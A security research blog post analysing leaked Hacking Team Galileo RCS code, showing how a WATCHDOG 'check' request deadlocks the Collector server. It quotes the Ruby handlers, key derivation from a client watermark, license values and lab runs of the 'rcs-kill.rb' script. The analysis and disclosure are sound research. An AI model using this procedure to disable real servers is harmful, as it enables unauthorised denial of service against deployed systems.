This is the next post in our series on examining Hacking Team’s Galileo Remote Control System (RCS). This time we’re looking at an embedded ‘kill switch’ within the system that allows Hacking Team to remotely disable a client’s software.

This work has been featured previously on Ars Technica, and was precipitated by a press release from Hacking Team. The salient paragraph is below:

There have been reports that our software contained some sort of “backdoor” that permitted Hacking Team insight into the operations of our clients or the ability to disable their software. This is not true. No such backdoors were ever present, and clients have been permitted to examine the source code to reassure themselves of this fact.

Hacking Team’s customers are primarily Law Enforcement Agencies that don’t possess the in-house technical capability to build and maintain an espionage platform. Here we’re going to look at why even Government Agencies should conduct source-code analysis specifically for security before using anything in a mission-critical environment.



If you’ve been following the series, you’ll know that the Galileo RCS is highly modular, with multiple servers running the entire system.

RCS Architecture from the leaked Sysadmin manual


The ‘vulnerability’ is in the ‘Collector’, the server that acts as the bridge between the Master database and the targets. The kill switch disables this node and prevents any of the targets from calling home, effectively killing all operations for that client.

The killswitch is in the section of code below - see if you can spot it.

def watchdog_request(request)

# authenticate with crc signature

return method_not_allowed if BCrypt::Password.new(DB.instance.crc_signature) != @request[:uri].gsub("/", '')

# decrypt the request

command = aes_decrypt(request[:content], DB.instance.sha1_signature)

# send the response

return ok(aes_encrypt("#{Time.now.getutc.to_f} #{$version} #{$external_address} #{DB.instance.check_signature}", DB.instance.sha1_signature), {content_type: "application/octet-stream"}) if command.eql? 'status'

return ok(aes_encrypt("#{DB.instance.check_signature}", DB.instance.sha1_signature), {content_type: "application/octet-stream"}) if command.eql? 'check' and $watchdog.lock

end

To add some context to this snippet, this function is within the ‘http_controller.rb’ script that handles all of the HTTP requests that the collector receives. These can broadly be categorised as either implant communications or administrative functions. Alongside the traditional request methods like ‘GET’ or ‘POST’, the server also implements a custom request method: ‘WATCHDOG’. These requests are passed to the ‘watchdog’ handler function:

def watchdog

# only the DB is authorized to send WATCHDOG commands

unless from_db?(@request[:headers])

trace :warn, "HACK ALERT: #{@request[:peer]} is trying to send WATCHDOG [#{@request[:uri]}] commands!!!"

return method_not_allowed

end

# reply to the periodic heartbeat request

return watchdog_request(@request)

end

This validates that the request is authorised (though not, strictly, that it comes from the database; more on that later) before handing off to the snippet we saw earlier.

As we can see, there are two possible commands supported within ‘WATCHDOG’ requests - ‘status’ and ‘check’, both fairly innocuous. The request is decrypted using the AES encryption that is standard to Hacking Team (AES-128-CBC, IV of all zeros…). A ‘status’ command then returns information about the deployment:

return ok(aes_encrypt("#{Time.now.getutc.to_f} #{$version} #{$external_address} #{DB.instance.check_signature}", DB.instance.sha1_signature), {content_type: "application/octet-stream"}) if command.eql? 'status'
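To see why the all-zero IV mentioned above is worth the ellipsis, here is a minimal sketch of AES-128-CBC with a fixed zero IV using Ruby’s OpenSSL bindings. It is not Hacking Team’s ‘aes_encrypt’ helper: the function names and the 16-byte key are our own assumptions for illustration. With a fixed IV, the same command encrypted under the same key always yields the same ciphertext.

```ruby
require 'openssl'

# Hypothetical 16-byte key for illustration only; not taken from the leak.
KEY = 'k' * 16
# The fixed, all-zero IV described in the post.
ZERO_IV = "\x00" * 16

# Encrypt with AES-128-CBC and the zero IV (assumed helper name).
def zero_iv_encrypt(plaintext, key)
  cipher = OpenSSL::Cipher.new('aes-128-cbc')
  cipher.encrypt
  cipher.key = key
  cipher.iv = ZERO_IV
  cipher.update(plaintext) + cipher.final
end

# Decrypt with the same parameters (assumed helper name).
def zero_iv_decrypt(ciphertext, key)
  cipher = OpenSSL::Cipher.new('aes-128-cbc')
  cipher.decrypt
  cipher.key = key
  cipher.iv = ZERO_IV
  cipher.update(ciphertext) + cipher.final
end

first  = zero_iv_encrypt('check', KEY)
second = zero_iv_encrypt('check', KEY)

# With a fixed IV the two ciphertexts are byte-for-byte identical.
puts "identical ciphertexts: #{first == second}"
puts "round trip: #{zero_iv_decrypt(first, KEY)}"
```

A random IV per message would make the two ciphertexts differ, which is why a constant IV is generally considered poor practice.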

On the other hand, the ‘check’ function just returns the system signature (or watermark). We’ll re-arrange the function to make it a bit clearer what’s happening, though:

if command.eql? 'check' and $watchdog.lock

  return ok(aes_encrypt("#{DB.instance.check_signature}", DB.instance.sha1_signature), {content_type: "application/octet-stream"})

end

For those of you not into Ruby or programming, the if statement checks if a True/False statement is true, and if it is then runs the code below it.

The ‘and’ keyword provides a second True/False statement that must also be true for the code to be executed.

So what is ‘$watchdog.lock’, and why does it count as ‘True’? We’re not comparing anything to anything. Ruby treats every value other than ‘false’ and ‘nil’ as true, so all that matters is what the call returns. In Ruby, the ‘$’ symbol indicates a global variable, and the ‘.lock’ means that we’re running the ‘lock’ function (strictly a method) of the ‘watchdog’ variable.

Looking through the rest of the code for a reference to this ‘$watchdog’, we find it in the very beginning of the setup code for the Collector:

# the global watchdog

$watchdog = Mutex.new

So ‘$watchdog’ is a Mutex. These are used in multi-threaded applications to let multiple threads access a resource, but not simultaneously (i.e. Mutually Exclusive). If you acquire a ‘lock’ on a Mutex, you prevent any other thread from acquiring it until you release it. The ‘check’ branch acquires the lock on ‘$watchdog’ and never releases it, so every other thread that needs the mutex is stopped for good.
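The behaviour is easy to reproduce outside the Collector. The sketch below uses a local ‘watchdog’ variable as a stand-in for the global; everything else is plain Ruby standard library. It shows that ‘lock’ returns the mutex itself (which is why the ‘and’ condition passes), and that another thread can no longer take the lock.

```ruby
# Local stand-in for the Collector's global $watchdog.
watchdog = Mutex.new

# Mutex#lock returns the mutex itself, which Ruby treats as true.
lock_result = watchdog.lock
returns_self = lock_result.equal?(watchdog)

# A non-blocking attempt from a different thread now fails,
# because the main thread still holds the lock.
other_thread_got_lock = Thread.new { watchdog.try_lock }.value

puts "lock returned the mutex itself: #{returns_self}"
puts "another thread could take the lock: #{other_thread_got_lock}"
```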

What else uses ‘$watchdog’?

def process_http_request

# get the peer of the communication

# if direct or thru an anonymizer

peer = http_get_forwarded_peer(@http)

@peer = peer unless peer.nil?

#trace :info, "[#{@peer}] Incoming HTTP Connection"

size = (@http_content) ? @http_content.bytesize : 0

trace :debug, "[#{@peer}] REQ: [#{@http_request_method}] #{@http_request_uri} #{@http_query_string} (#{Time.now - @request_time}) #{size.to_s_bytes}" unless @http_request_method.eql? 'WATCHDOG'

# get it again since if the connection is kept-alive we need a fresh timing for each

# request and not the total from the beginning of the connection

@request_time = Time.now

# update the connection statistics

StatsManager.instance.add conn: 1

$watchdog.synchronize do #<- If this mutex is locked, it won't happen...

SNIP - Handles HTTP Request

end

end

So if the ‘$watchdog’ mutex is locked, the ‘$watchdog.synchronize’ call will never succeed, and the server won’t handle any HTTP requests. If we can issue a ‘WATCHDOG’ ‘check’ message to the server, it will stop processing HTTP requests, preventing all targets from calling home. Obviously this would have a severe effect on a government’s operations…
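As a rough illustration of that effect, the sketch below models request handling as a thread that does its work inside ‘synchronize’. The ‘serve’ helper and the request names are hypothetical; the lock is taken on the main thread, which stays alive for the whole run, standing in for the ‘check’ branch that never unlocks.

```ruby
watchdog = Mutex.new
handled = []

# Hypothetical stand-in for process_http_request:
# the work only happens inside watchdog.synchronize.
def serve(mutex, log, name)
  Thread.new { mutex.synchronize { log << name } }
end

# Before the kill switch fires, requests are handled normally.
serve(watchdog, handled, 'before kill').join

# The 'check' branch: take the lock and never release it.
watchdog.lock

# A later request blocks inside synchronize; join with a timeout
# returns nil when the thread has not finished.
late_request = serve(watchdog, handled, 'after kill')
still_blocked = late_request.join(0.2).nil?
late_request.kill # tidy up the blocked thread so the sketch can exit

puts "handled requests: #{handled.inspect}"
puts "later request still blocked: #{still_blocked}"
```

Only the first request is ever recorded; the second one waits on the mutex until we give up on it.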

But there are some protective measures in place, as you saw previously. The server first checks if the request is ‘from_db?()’:

def from_db?(headers)

return false unless headers

# search the header for our X-Auth-Frontend value

auth = headers[:x_auth_frontend]

return false unless auth

# take the values

sig = auth.split(' ').last

# only the db knows this

return true if sig == File.read(Config.instance.file('DB_SIGN'))

return false

end

So the ‘from_db?’ function actually just checks that the request has the ‘x-auth-frontend’ header and that its value matches the signature of the database. The remaining authorisation checks are in the ‘watchdog_request’ function, where first the URI of the request is checked against the bcrypt-hashed form of the database’s ‘crc_signature’, and then the content of the request is decrypted using the ‘sha1_signature’ of the database.

return method_not_allowed if BCrypt::Password.new(DB.instance.crc_signature) != @request[:uri].gsub("/", '')

# decrypt the request

command = aes_decrypt(request[:content], DB.instance.sha1_signature)

Both of these ‘signatures’ are loaded from the license file during the database installation; if we have a look at the bottom of the license, we can see the exact values:

:check: 3OqZ1N5a

:digest_enc: true

:crc: $2a$10$rQULDKlViK8zQmFe2F1rT.dw.dXaG5f6mU7EerC188SBsp3t2IGz6

:sha1: 80987d0c145eb5a71294fce8306761aa36e4820318b7125e8f1ab66a42375b13

So how do we get these values? There are two locations where these values are known: the master node itself, and Hacking Team HQ (where the licenses were generated).

This kill switch is very well concealed from source code analysis, and would normally be very hard to spot. However, we were pointed to it by a file called ‘rcs-kill.rb’ located within the development ‘rcs-db\scripts’ directory of the leak. This file contains a function that is very explicit about its purpose:

def kill_collector(url)

puts

puts "Killing #{url}"

resp = request(url, 'check')

raise "Bad response, probably not a collector" unless resp.kind_of? Net::HTTPOK

response = aes_decrypt(resp.body, $key)

puts

raise "Kill command not successful" unless response.size != 0

puts "Kill command successfully issued to #{url} (check: #{response})"

end

This function triggers the kill switch through the use of the ‘check’ watchdog function. The key material from earlier (‘crc_signature’ and ‘sha1_signature’) is generated at the beginning of the script:

$auth = Digest::SHA2.digest(options[:auth] + '©ªºª•¶§∞¢').unpack('H*').first

$key = Digest::SHA2.digest(options[:auth] + 'µ˜∫√ç|¡™£¢∞').unpack('H*').first

So the only piece of information needed to generate these two values (and therefore send a valid ‘WATCHDOG’ command) is the ‘auth’ option. It turns out this ‘auth’ value is the watermark that uniquely identifies a client. These watermarks are 8-character strings of upper and lower case letters and digits (ours is ‘3OqZ1N5a’) that tie a license to a particular client. How do we know this? The first half of the ‘rcs-kill.rb’ script is a complete list of client watermarks, along with client identifiers. As everyone who used the RCS had a license, their watermark was added to this list.
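To make the dependency explicit, the two lines from ‘rcs-kill.rb’ can be wrapped in a small function of the watermark alone. This is a sketch: ‘derive_watchdog_material’ is our own hypothetical name, the suffix strings are copied from the lines quoted above, and we assume the file is read as UTF-8 (the bytes hashed, and so the exact output, depend on the source encoding of the original script).

```ruby
require 'digest/sha2'

# Suffix strings as quoted from rcs-kill.rb above (assumed UTF-8 here).
AUTH_SUFFIX = '©ªºª•¶§∞¢'
KEY_SUFFIX  = 'µ˜∫√ç|¡™£¢∞'

# Hypothetical helper: everything is derived from the watermark,
# with no other secret involved.
def derive_watchdog_material(watermark)
  {
    auth: Digest::SHA2.digest(watermark + AUTH_SUFFIX).unpack('H*').first,
    key:  Digest::SHA2.digest(watermark + KEY_SUFFIX).unpack('H*').first
  }
end

material = derive_watchdog_material('3OqZ1N5a')

# Digest::SHA2 defaults to SHA-256, so each value is 64 hex characters.
puts "auth length: #{material[:auth].length}"
puts "key length:  #{material[:key].length}"
```

The point is that nothing in the derivation is secret apart from the watermark itself.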

So if we know the client watermark, we can generate the authentication parameters, issue a ‘WATCHDOG’ request, and therefore shut down the target collector.

So tying this all together, can I kill the collector in my virtual lab using this script, and my watermark?

First we get the collector information using the auth code:

root@4A-JG-Kali:~/GalileoRCS/OpShutdown# ruby rcs-kill.rb -a 3OqZ1N5a -i 10.0.0.30

Requesting info to 10.0.0.30

Connecting to: 10.0.0.30

Collector watermark: 3OqZ1N5a

Collector customer : FAE-FURLAN

Collector address : 10.0.0.10

Collector version : 9.6.0

Collector time : 2015-07-23 16:42:11 UTC

root@4A-JG-Kali:~/GalileoRCS/OpShutdown#

So now we’ve confirmed it’s a valid collector, we can close it down:

root@4A-JG-Kali:~/GalileoRCS/OpShutdown# ruby rcs-kill.rb -a 3OqZ1N5a -k 10.0.0.30

Killing 10.0.0.30

Connecting to: 10.0.0.30

Kill command successfully issued to 10.0.0.30 (check: 3OqZ1N5a)

root@4A-JG-Kali:~/GalileoRCS/OpShutdown#

So have we killed it?



Now we look at the logs on the collector instance:

2015-07-23 17:44:53 +0100 [ERROR]: INTERNAL SERVER ERROR: 10.0.0.40 something caused a deep exception: No live threads left. Deadlock?

And now none of our implants can connect back.

So why would Hacking Team have this?

As mentioned in the Ars post, a number of leaked documents indicate that Hacking Team had a ‘crisis procedure’. This involved monitoring VirusTotal to see if any of their agents appeared. If any were leaked, they would unpack and analyse the binary to find the client watermark, then kill the associated anonymisers and collector using the ‘rcs-kill.rb’ script.

So to sum up, we’ve identified a code path that allows a client’s collector systems to be remotely disabled by anyone with access to the 8-character watermark identifying the client. Leaving aside brute forcing, this set of characters is embedded within every implant communicating with the collector, potentially allowing a target to turn off the infrastructure. The leak of every single watermark therefore has a massive impact not just on attribution of malware, but also potentially on the operations of every Hacking Team client. This completely contradicts their earlier press release, and raises questions about the level of source code analysis that the software underwent before it was delivered to customers.

In a recent message, Hacking Team asked its clients to stop using their software. Here we’ve demonstrated why the most recent leak completely exposes Galileo RCS operations worldwide, and why their customers should heed this advice.